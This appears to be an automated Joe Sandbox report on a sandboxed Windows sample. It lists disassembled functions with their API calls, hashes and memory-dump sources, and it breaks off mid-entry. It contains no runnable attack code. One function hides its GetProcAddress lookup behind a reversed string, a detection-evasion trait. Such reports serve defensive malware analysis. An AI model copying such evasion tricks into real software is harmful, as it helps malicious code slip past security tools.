                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: (mG
                                                          • API String ID: 2536120697-4059303827
                                                          • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                          • Instruction ID: 65eab575d61051fb7cba4f8c702b98188872e5d9cf8ea912f4766ea8adf29b6f
                                                          • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                          • Instruction Fuzzy Hash: 0B112C76500218ABCB14FBA8D9408DEB77AEFC0710B56456BE918AB290DF359E45CFD0
                                                          Function 028FAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 028FAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
                                                            • Part of subcall function 028FAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
                                                            • Part of subcall function 028FAD3C: GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
                                                            • Part of subcall function 028FAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E
                                                          • CharToOemA.USER32(?,?), ref: 028FAEFB
                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028FAF18
                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF1E
                                                          • GetStdHandle.KERNEL32(000000F4,028FAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF33
                                                          • WriteFile.KERNEL32(00000000,000000F4,028FAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF39
                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028FAF5B
                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 028FAF71
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                          • String ID:
                                                          • API String ID: 185507032-0
                                                          • Opcode ID: 6dfc5430a343fdd4e7b0dc040015d3ed3dbc77dc64f814802e9c7fa920f17ff3
                                                          • Instruction ID: dc3172198aab26cc8488e3d1903044806c08c985c6447303fba6b2aa59a52712
                                                          • Opcode Fuzzy Hash: 6dfc5430a343fdd4e7b0dc040015d3ed3dbc77dc64f814802e9c7fa920f17ff3
                                                          • Instruction Fuzzy Hash: 00115EBE548304BAD280FBA8CC81F9B77BDAB44710F404A15B758DA0D0EA75E9048B63
                                                          Function 029B20EC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __allrem.LIBCMT ref: 029B2279
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029B2295
                                                          • __allrem.LIBCMT ref: 029B22AC
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029B22CA
                                                          • __allrem.LIBCMT ref: 029B22E1
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029B22FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                          • Instruction ID: a4923bb492616656baa9fa3df947f181a20888b5d1967fabbc3311f3c527d4dd
                                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                          • Instruction Fuzzy Hash: BF81C572E00B069BE7279B68CD41BEA73EEEF84764F24453EE911D7280E774D9018B51
                                                          Function 029BAE69 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 6cafc8de57892fd614af7c3accbdcbc7a01b4784fb7c252a1c394b1424185e80
                                                          • Instruction ID: ba31afece59387d090e3783622871f753e67e90b5c9fb71507c839740d4a4063
                                                          • Opcode Fuzzy Hash: 6cafc8de57892fd614af7c3accbdcbc7a01b4784fb7c252a1c394b1424185e80
                                                          • Instruction Fuzzy Hash: A451C0B79042116BDF27AF68D948BFAB7ADDF85724F14406AED449B240EB329D01C7A0
                                                          Function 029BCF0A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                          • Instruction ID: 6234c4edf3374a6084a4847f96fd8b14146ff790b87f0d368c7335a156502bc7
                                                          • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                          • Instruction Fuzzy Hash: 9E511B72904205AFDF269B688E44FEE77ADAF89324F14426BF819E6181DB31D501CA74
                                                          Function 028FE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE625
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE641
                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028FE67A
                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE6F7
                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028FE710
                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 028FE745
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                          • String ID:
                                                          • API String ID: 351091851-0
                                                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                          • Instruction ID: b1ae6e2e7411cab1dc8c5d854adac4aec59a995b7ee98975465b8e40e24b801a
                                                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                          • Instruction Fuzzy Hash: BE51E97D90122D9BCBA2DB58CC80BD9B3BDAF49300F0041D5E709E7211DA34AF858F65
                                                          Function 02978DFA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029ABD91: __onexit.LIBCMT ref: 029ABD97
                                                          • __Init_thread_footer.LIBCMT ref: 02978E4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: PkG$XMG$NG$NG
                                                          • API String ID: 1881088180-3151166067
                                                          • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                          • Instruction ID: d3f35e433c967b6b5513c450bccbd112ef2ad66087a729d38a2913904df9f2d2
                                                          • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                          • Instruction Fuzzy Hash: 44418D311042609BD324FB24DCA8AEE73ABEFD5724F50453EE54A961E0DF30694ACF5A
                                                          Function 029B9DE1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                          • Instruction ID: d91477afb0b45f7bd078434c253b5b02cf43b76a487c0692a4c91a9e8a4b8419
                                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                          • Instruction Fuzzy Hash: DC41FA76910304AFE7259F78CA40BEABBE9EFC8710F10456EE656DB280D77199418F90
                                                          Function 028F3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35BA
                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028F3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35ED
                                                          • RegCloseKey.ADVAPI32(?,028F3610,00000000,?,00000004,00000000,028F3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F3603
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                          • API String ID: 3677997916-4173385793
                                                          • Opcode ID: d64a680c2d58bc0e9d61f9a7a873a91354b7c51bd300a35843df408d8cca54a1
                                                          • Instruction ID: 29f17367329dc28d3b4265cd66573d649d268d68da47627fa10071634d314a51
                                                          • Opcode Fuzzy Hash: d64a680c2d58bc0e9d61f9a7a873a91354b7c51bd300a35843df408d8cca54a1
                                                          • Instruction Fuzzy Hash: AC01B17D944258BAFB51DBD1CD02BB977FCDB08B00F1005A2FF04D6780E678AA10DA69
                                                          Function 02908274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                          • GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: Kernel32$sserddAcorPteG
                                                          • API String ID: 667068680-1372893251
                                                          • Opcode ID: c3bd4343a9ee29e83c64e3eef0722675c024e43faf80f4b38bb523eb84207562
                                                          • Instruction ID: 2235a7a4d8da742669908b4e5918aac79f82c7061ff8025c793045b0712899b4
                                                          • Opcode Fuzzy Hash: c3bd4343a9ee29e83c64e3eef0722675c024e43faf80f4b38bb523eb84207562
                                                          • Instruction Fuzzy Hash: 2A016C7C744308EFEB44EBA8EC81EAEB7EEFB8C710F514461BA00D7641D574A904CA25
                                                          Function 029BC30C Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                          • Instruction ID: 6007cc9947dcaa6a87c86f95aec0bb5e2f7af801d811f421b89508e478bbdef0
                                                          • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                          • Instruction Fuzzy Hash: 8351D371A00704AFDB22DF69CE41BAA77FAEF89724F14456EE809D7250E735EA01CB50
                                                          Function 029BB429 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                          • Instruction ID: bfeaae1c4481b2298efc2efb8720a6b678a60c27c7ea55a0081c92fd81ab1fcb
                                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                          • Instruction Fuzzy Hash: 0D41E632A002009FCB11DFB8C994AADB7B6FF84718F1585A9D915EB390D731E901CB81
                                                          Function 029B1E4A Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 242264518-0
                                                          • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                          • Instruction ID: 75be7c540779af916c053d72ae6d861686cad65327cd3c0483de0ef04b1675bc
                                                          • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                          • Instruction Fuzzy Hash: C6319C7680420AFBDF13AFA4DD58DEE7B6DEF85325B104269F918561A0DB31CD10CBA0
                                                          Function 029B196A Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 029B1986
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 029B199F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value___vcrt_
                                                          • String ID:
                                                          • API String ID: 1426506684-0
                                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                          • Instruction ID: f959cf5e0e8450488dc3d2a3abd0f90464db8da570ae5962fd9bda2d573c8116
                                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                          • Instruction Fuzzy Hash: E501F7336197926EA61727B8FEA47EB2B4EFF467B5720433AE21C514F0FF1188848558
                                                          Function 028FAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetThreadLocale.KERNEL32(?,00000000,028FAAE7,?,?,00000000), ref: 028FAA68
                                                            • Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2
                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,028FAAE7,?,?,00000000), ref: 028FAA98
                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 028FAAA3
                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,028FAAE7,?,?,00000000), ref: 028FAAC1
                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 028FAACC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                          • String ID:
                                                          • API String ID: 4102113445-0
                                                          • Opcode ID: 2340f63aca7ce0afb3959e4e2622471ffd12ff57c84d3802246c7ffc05654317
                                                          • Instruction ID: 0a6c3d55f04dbe1877f721445cb4f82ac1d25611fed1b7ccc761a14dffaa8efe
                                                          • Opcode Fuzzy Hash: 2340f63aca7ce0afb3959e4e2622471ffd12ff57c84d3802246c7ffc05654317
                                                          • Instruction Fuzzy Hash: 1101DFBC2003447BF696AA68CD11B6F736DDB86720F510260E728E66C1E6699E108A66
                                                          Function 029C7FCC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
